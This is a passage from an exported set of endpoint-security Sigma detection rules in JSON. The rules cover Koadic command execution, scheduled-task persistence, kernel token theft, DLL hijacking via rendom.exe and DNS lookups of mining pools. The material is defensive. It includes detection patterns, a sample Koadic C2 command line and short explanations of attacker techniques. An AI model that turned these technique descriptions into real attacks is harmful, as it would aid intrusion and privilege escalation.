"rule_description": "Detects the dumping of the NTDS.dit file on a live Domain Controller to extract all user credentials.\nAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\nIt is recommended to determine if this dump is part of a regular backup mechanism, and, if it is not, to immediately take remedial actions to cut the attackers' access to the domain controller.\n",
"rule_creation_date": "2020-11-05",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.003",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a4aa19f3-3192-47f5-a0f6-5efc28a4fa98",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083858Z",
"creation_date": "2026-03-23T11:45:34.083860Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083865Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1202/",
"https://attack.mitre.org/software/S0250/"
],
"name": "t1202_koadic_command_exec.yml",
"content": "title: Koadic Command Executed\nid: a4aa19f3-3192-47f5-a0f6-5efc28a4fa98\ndescription: |\n Detects patterns used by Koadic to execute remote commands on infected systems.\n Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n Such commands are prefixed by a call to `chcp` to ensure the output is in English, which is also redirected to a temporary file that is then transferred back to the C2 server.\n It is recommended to investigate the command-line performing this action to determine its legitimacy and to look for other malicious actions. The network activity can be used to identify the machine at the origin of this action.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1202/\n - https://attack.mitre.org/software/S0250/\ndate: 2021/04/29\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - attack.s0250\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Koadic\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # cmd.exe /q /c chcp 850 & cd 1> C:\\Users\\user\\AppData\\Local\\Temp\\925c7ae3-4336-43f0-9a7d-90d2cc35ed56.txt 2>&1\n selection_bin:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n\n selection_cmd:\n CommandLine|contains: '/q /c chcp * & * 1> ?:\\\\*\\Temp\\\\????????-????-????-????-????????????.txt 2>&1'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a4aa19f3-3192-47f5-a0f6-5efc28a4fa98",
"rule_name": "Koadic Command Executed",
"rule_description": "Detects patterns used by Koadic to execute remote commands on infected systems.\nKoadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nSuch commands are prefixed by a call to `chcp` to ensure the output is in English, which is also redirected to a temporary file that is then transferred back to the C2 server.\nIt is recommended to investigate the command-line performing this action to determine its legitimacy and to look for other malicious actions. The network activity can be used to identify the machine at the origin of this action.\n",
"rule_creation_date": "2021-04-29",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a4efa888-5666-4c7a-be53-94ec7fa3b9c9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620746Z",
"creation_date": "2026-03-23T11:45:34.620749Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620754Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_unusual_task_with_many_actions.yml",
"content": "title: Scheduled Task With Unusual Number of Actions\nid: a4efa888-5666-4c7a-be53-94ec7fa3b9c9\ndescription: |\n Detects the creation or update of a scheduled task containing two actions or more.\n Threat actors may update an initially legitimate scheduled task by appending a second action (scheduled task's way of executing code) that launches their malicious payload for persistence as a way to avoid defenses.\n It is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness.\nreferences:\n - https://www.cybertriage.com/blog/windows-scheduled-tasks-for-dfir-investigations/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/09/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection:\n OperationType:\n - 'create'\n - 'update'\n NumberOfActions|gte: 2\n ProcessImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_microsoft_mare_backup:\n TaskName: '\\Microsoft\\Windows\\Application Experience\\MareBackup'\n FirstActionCommandLine: '%windir%\\system32\\compattelrunner.exe -m:aeinv.dll 
-f:UpdateSoftwareInventoryW invsvc'\n NumberOfActions: 3\n\n exclusion_microsoft_compat_appraise:\n TaskName: '\\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser'\n FirstActionCommandLine: '%windir%\\system32\\compattel\\DiagTrackRunner.exe /UploadEtlFilesOnly'\n NumberOfActions: 2\n\n exclusion_microsoft_tpm_clear:\n TaskName: '\\Microsoft\\Windows\\TPM\\ClearTPMIfNotReady'\n FirstActionCommandLine: 'tpminit.exe /cleartpmbypolicy'\n NumberOfActions: 2\n\n exclusion_microsoft_server_manager:\n TaskName: '\\Microsoft\\Windows\\Server Manager\\RemovewYukon'\n FirstActionCommandLine: 'msiexec /q /x {BDD79957-5801-4A2D-B09E-852E7FA64D01} CALLERID=ocsetup.exe'\n NumberOfActions: 2\n\n exclusion_microsoft_win11_perfmon:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\perfmon.exe /noelev /report'\n TaskName: '\\Microsoft\\Windows\\PLA\\System\\{????????-????-????-????-????????????}_System Diagnostics'\n\n exclusion_update_touch_mode:\n TaskName|startswith: '\\eGalaxUpdateTouchMode'\n FirstActionCommandLine: '\"?:\\Program Files\\Common Files\\EETI\\TouchControl.exe\" -UpdateTouchMode'\n\n exclusion_avira:\n TaskName: '\\Avira_Security_Maintenance'\n FirstActionCommandLine: '?:\\Program Files (x86)\\Avira\\Security\\Avira.Spotlight.Service.Worker.exe FallbackTelemetry'\n\n exclusion_av:\n TaskName: '\\AVAST Software\\Gaming mode Task Scheduler recovery'\n ProcessImage:\n - '?:\\Program Files\\AVAST Software\\Suite\\\\*ToolsSvc.exe'\n - '?:\\Program Files\\AVAST Software\\Avast\\\\*ToolsSvc.exe'\n - '?:\\Program Files\\AVG\\Antivirus\\\\*ToolsSvc.exe'\n\n exclusion_amazon_managed_services:\n TaskName: '\\CleanUpAMS_Service'\n FirstActionCommandLine: 'powershell.exe -ExecutionPolicy Bypass -File \"%ProgramData%\\AMD\\Manageability\\AMSUninstallCleanup.ps1\"'\n\n exclusion_lenovo:\n TaskName: '\\Lenovo\\DockManager\\DockManager - Service Launcher'\n FirstActionCommandLine: 'NET STOP \"dockmgr.svc.exe\"'\n\n exclusion_rudder:\n TaskName: 
'\\Rudder-Agent'\n FirstActionCommandLine: 'powershell.exe -NonInteractive -NoLogo -WindowStyle Hidden -file \"?:\\Program Files\\Rudder?bin?rudder.ps1\" agent update'\n\n exclusion_egalax:\n TaskName: '\\eGalaxRegisterTaskService'\n FirstActionCommandLine|contains: '?:\\Program Files\\Common Files\\EETI\\TouchControl.exe\" -UpdateTouchMode'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a4efa888-5666-4c7a-be53-94ec7fa3b9c9",
"rule_name": "Scheduled Task With Unusual Number of Actions",
"rule_description": "Detects the creation or update of a scheduled task containing two actions or more.\nThreat actors may update an initially legitimate scheduled task by appending a second action (scheduled task's way of executing code) that launches their malicious payload for persistence as a way to avoid defenses.\nIt is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness.\n",
"rule_creation_date": "2025-09-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5115c2e-c9c3-43cf-aa11-a7001d4f852f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596184Z",
"creation_date": "2026-03-23T11:45:34.596187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596195Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://jonny-johnson.medium.com/changing-primary-tokens-session-id-931c269aa08e",
"https://www.solomonsklash.io/stealing-tokens-with-malicious-driver.html",
"https://attack.mitre.org/techniques/T1134/001/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1134_001_primary_token_theft_kernel.yml",
"content": "title: Primary Token Theft Detected\nid: a5115c2e-c9c3-43cf-aa11-a7001d4f852f\ndescription: |\n Detects a process primary token being stolen and added to another process either directly from kernel memory or through NtSetInformationProcess.\n Attackers can use vulnerable kernel drivers to have read/write primitives on the kernel memory.\n Using these primitives, attackers can modify undocumented kernel structures pertaining to processes, and more specifically copy access tokens to other processes to elevate their privileges.\n Attackers can also use NtSetInformationProcess to add a process's primary token to another process while it is suspended.\n It is recommended to search for unusual driver loads preceding this alert, as well as to analyze the targeted process for malicious content or behavior.\nreferences:\n - https://jonny-johnson.medium.com/changing-primary-tokens-session-id-931c269aa08e\n - https://www.solomonsklash.io/stealing-tokens-with-malicious-driver.html\n - https://attack.mitre.org/techniques/T1134/001/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/02/01\nmodified: 2025/09/24\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - attack.t1068\n - classification.Windows.Source.PrimaryTokenChange\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: primary_token_change\ndetection:\n selection_low_to_privileged:\n ProcessIntegrityLevel:\n - 'Untrusted'\n - 'Low'\n - 'Medium'\n - 'Unknown'\n NewIntegrityLevel:\n - 'High'\n - 'System'\n\n selection_high_to_system:\n ProcessIntegrityLevel: 'High'\n NewIntegrityLevel: 'System'\n\n filter_msiexec:\n NewIntegrityLevel: 'System'\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n\n filter_broken_tokens:\n - ProcessParentIntegrityLevel: 'Unknown'\n - ProcessGrandparentIntegrityLevel: 'Unknown'\n\n exclusion_posix_subsystem:\n - ProcessGrandparentImage: 
'?:\\Windows\\System32\\psxss.exe'\n - ProcessParentImage: '?:\\Windows\\System32\\psxss.exe'\n - ProcessImage: '?:\\Windows\\System32\\psxss.exe'\n\n exclusion_uni_elevator:\n ProcessParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\UniGetUI\\Assets\\Utilities\\UniGetUI Elevator.exe'\n - '?:\\Program Files\\WingetUI\\Assets\\Utilities\\UniGetUI Elevator.exe'\n - '?:\\Program Files\\UniGetUI\\Assets\\Utilities\\UniGetUI Elevator.exe'\n\n exclusion_total_security:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\360\\Total Security\\'\n - '?:\\Program Files\\360\\Total Security\\'\n - '?:\\Program Files (x86)\\360\\360safe\\'\n - '?:\\Program Files\\360\\360safe\\'\n\n exclusion_gsudo:\n ProcessParentOriginalFileName:\n - 'gsudo.dll'\n - 'gsudo.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'Gerardo Grignoli'\n - 'Inext Ventures Inc'\n\n exclusion_avast:\n ProcessAncestors|contains:\n - '?:\\Program Files\\Avast Software\\Avast\\AvastSvc.exe'\n - '?:\\Program Files (x86)\\Avast Software\\Avast\\AvastSvc.exe'\n\n exclusion_wsl:\n - ProcessImage: '?:\\Windows\\System32\\wsl.exe'\n - ProcessAncestors|contains: '?:\\Windows\\System32\\wsl.exe'\n\n exclusion_ivanti_workspace_control:\n ProcessAncestors|contains:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n - '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n - '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n - '?:\\Program Files\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\wmstartmenu.exe'\n - '?:\\Program Files\\RES Software\\Workspace 
Manager\\wmstartmenu.exe'\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5115c2e-c9c3-43cf-aa11-a7001d4f852f",
"rule_name": "Primary Token Theft Detected",
"rule_description": "Detects a process primary token being stolen and added to another process either directly from kernel memory or through NtSetInformationProcess.\nAttackers can use vulnerable kernel drivers to have read/write primitives on the kernel memory.\nUsing these primitives, attackers can modify undocumented kernel structures pertaining to processes, and more specifically copy access tokens to other processes to elevate their privileges.\nAttackers can also use NtSetInformationProcess to add a process's primary token to another process while it is suspended.\nIt is recommended to search for unusual driver loads preceding this alert, as well as to analyze the targeted process for malicious content or behavior.\n",
"rule_creation_date": "2024-02-01",
"rule_modified_date": "2025-09-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1134.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a512ebf0-fe11-4238-a1ce-fefde18c321c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086835Z",
"creation_date": "2026-03-23T11:45:34.086837Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086842Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/netero1010/GhostTask",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1112_scheduled_task_created_registry.yml",
"content": "title: Scheduled Task Created via Registry Modification\nid: a512ebf0-fe11-4238-a1ce-fefde18c321c\ndescription: |\n Detects the creation of a scheduled task via a manual registry modification.\n Scheduled tasks are often used by attackers as persistence mechanisms.\n To evade detection, they can create a scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/netero1010/GhostTask\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2023/11/22\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\\\*\\Id'\n Details: '{????????-????-????-????-????????????}'\n ProcessImage|contains: '?'\n\n filter_scheduler:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_tiworker:\n 
ProcessImage: '?:\\Windows\\WinSxS\\\\*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_kodak:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\kodakalarisincscanner\\Id'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a512ebf0-fe11-4238-a1ce-fefde18c321c",
"rule_name": "Scheduled Task Created via Registry Modification",
"rule_description": "Detects the creation of a scheduled task via a manual registry modification.\nScheduled tasks are often used by attackers as persistence mechanisms.\nTo evade detection, they can create a scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-11-22",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5514a00-d15f-42a9-9708-c4b080543efd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599998Z",
"creation_date": "2026-03-23T11:45:34.600002Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600010Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rendom.yml",
"content": "title: DLL Hijacking via rendom.exe\nid: a5514a00-d15f-42a9-9708-c4b080543efd\ndescription: |\n Detects potential Windows DLL Hijacking via rendom.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rendom.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dnsapi.dll'\n - '\\dsparse.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5514a00-d15f-42a9-9708-c4b080543efd",
"rule_name": "DLL Hijacking via rendom.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rendom.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a596512c-c042-4d93-aa3b-bcd10e987acb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294210Z",
"creation_date": "2026-03-23T11:45:35.294214Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294222Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.malwarebytes.com/cryptojacking",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_cryptominer_pool_dns_request_windows.yml",
"content": "title: DNS Request to Cryptocurrency Mining Pool (Windows)\nid: a596512c-c042-4d93-aa3b-bcd10e987acb\ndescription: |\n Detects a DNS resolution request for a known cryptocurrency mining pool website.\n A mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks quicker and share coins.\n This may be an indicator of hidden or covert mining programs in a system making requests to crypto pooling websites.\n It is recommended to investigate the process performing this request to determine its legitimacy.\nreferences:\n - https://www.malwarebytes.com/cryptojacking\n - https://attack.mitre.org/techniques/T1496/\ndate: 2023/04/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CryptoMiner\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - '2miners.com'\n - '6block.com'\n - 'acepool.top'\n - 'aionpool.tech'\n - 'alph-pool.com'\n - 'backend-aplha.com'\n - 'baikalmine.com'\n - 'blocx.zone'\n - 'bluenose.link'\n - 'bohemianpool.com'\n - 'c3pool.com'\n - 'cedric-crispin.com'\n - 'cryptonote.social'\n - 'crypto-pool.fr'\n - 'dxpool.net'\n - 'educu.xyz'\n - 'ekapool.com'\n - 'ethashpool.com'\n - 'ethermine.org'\n - 'ethwmine.com'\n - 'ezil.me'\n - 'f2pool.com'\n - 'fairhash.org'\n - 'fastpool.xyz'\n - 'flockpool.com'\n - 'fluxpools.net'\n - 'gntl.uk'\n - 'grinmint.com'\n - 'hashcity.org'\n - 'hashvault.pro'\n - 'herominers.com'\n - 'hiveon.com'\n - 'hiveon.net'\n - 'minerno.de'\n - 'minexmr.com'\n - 'miningmadness.com'\n - 'miningocean.org'\n - 'monerod.org'\n - 'monerohash.com'\n - 'moneroocean.stream'\n - 'monerop.com'\n - 'multi-pools.com'\n - 'nanopool.org'\n - 'nicehash.com'\n - 'p2pool.io'\n - 'pool2mine.net'\n - 'pool.binance.com'\n - 'poolin.com'\n - 'pool.kryptex.com'\n - 'pool.sero.cash'\n - 'pool.xmr.pt'\n - 'prohashing.com'\n - 
